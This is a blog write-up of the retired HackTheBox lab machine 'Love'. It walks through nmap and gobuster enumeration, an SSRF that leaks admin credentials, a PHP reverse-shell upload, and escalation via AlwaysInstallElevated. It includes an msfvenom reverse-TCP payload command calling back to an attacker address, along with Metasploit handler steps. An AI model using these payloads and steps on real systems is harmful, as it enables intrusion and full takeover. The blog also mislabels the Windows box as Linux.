Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Love
|htbmachinesretired|

Summary

Love is an easy linux box created by pwnmeow.
Initial Foothold was finding a credentials with a staging file scanner and using that to login to admin route of voting system. and uploading a php shell using which we get a shell.After getting shell running winPEAs we see we have AlwaysInstallElevated privilege. using which we get Administrator shell.

Initial Enumeration

Lets start with a nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# Nmap 7.91 scan initiated Sun May  2 09:32:59 2021 as: nmap -sC -sV -oN nmap/love 10.129.123.28
Nmap scan report for love.htb (10.129.123.28)
Host is up (0.16s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m30s, deviation: 4h02m30s, median: 21m29s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-01T21:25:01-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-02T04:25:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May  2 09:33:43 2021 -- 1 IP address (1 host up) scanned in 43.53 seconds

from this we see many intresting things but lets start with web services 80 and 443 from the cert common name we find staging.love.htb

Web (80 and 443)

Lets check the cert again in browser for any other info

We only se the same.

lets check love.htb on both 80 and 443

80

443

staging.love.htb

In that we see an demo

Seeing an URL I tried to curl myself and was seeing i was getting a request.

So I tried to curl a reverse shell. but was unsucessful.

Playing aroud with that to get anything from it.

I got nothing.

So I started an gobuster on love.htb and staging.love.htb

and started looking at other things smb gave me nothing another intresting port for me was 5000 visting that i got Forbidden (Maybe that is only allowed from internal network, localhost).

Lets go back to File Scanner

and try for http://127.0.0.1:5000/ and bingo we see an result and some credential.

Trying that on smb winrm don’t get me anything.

Checking the gobuster result we see

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
gobuster dir  -b 403,404 -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt  -u http://love.htb -x php -o love.gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://love.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/05/02 11:15:52 Starting gobuster in directory enumeration mode
===============================================================
/includes             (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/images               (Status: 301) [Size: 330] [--> http://love.htb/images/]
/admin                (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/login.php            (Status: 302) [Size: 0] [--> index.php]
/plugins              (Status: 301) [Size: 331] [--> http://love.htb/plugins/]

we see an new route /admin

using the creds we found admin:@LoveIsInTheAir!!!! we can get in.

Also checking the gobuster result we saw /images/ opening that we an index of all images.

and we can also find admin image in that folder.

Lets try to upload an PHP shell instead of image. and trigger it from images/shell.php (This is my thought process)

for php i rev shell i choose to use shell.php

Opening shell.php gave me a shell as love/pheobe

Privilege Escalation

Running winPeas on the box show that we have

AlwaysInstallElevated Privillege

Looking in the Hacktrick article we see we can use multiple ways to Escalate with this.

I choose to use metasploit to exploit this.

To do so i needed my shell to be an meterpreter shell

to do so i created an meterpreter shell.exe using 

1
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f exe -o shell.exe

and uploaded and ran on the box.

and captured the shell in msfconsole

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ sudo msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (175174 bytes) to 10.129.123.83
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.129.123.83:63483) at 2021-05-02 12:28:28 +0530

after getting the session i used the exploit exploit/windows/local/always_install_elevated

1
2
3
4
5
6
7
8
9
10
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/always_install_elevated
set session 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
nmsf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/always_install_elevated) > run

This open an new session as nt authority\system

and we get

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/love/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
activehtbmachines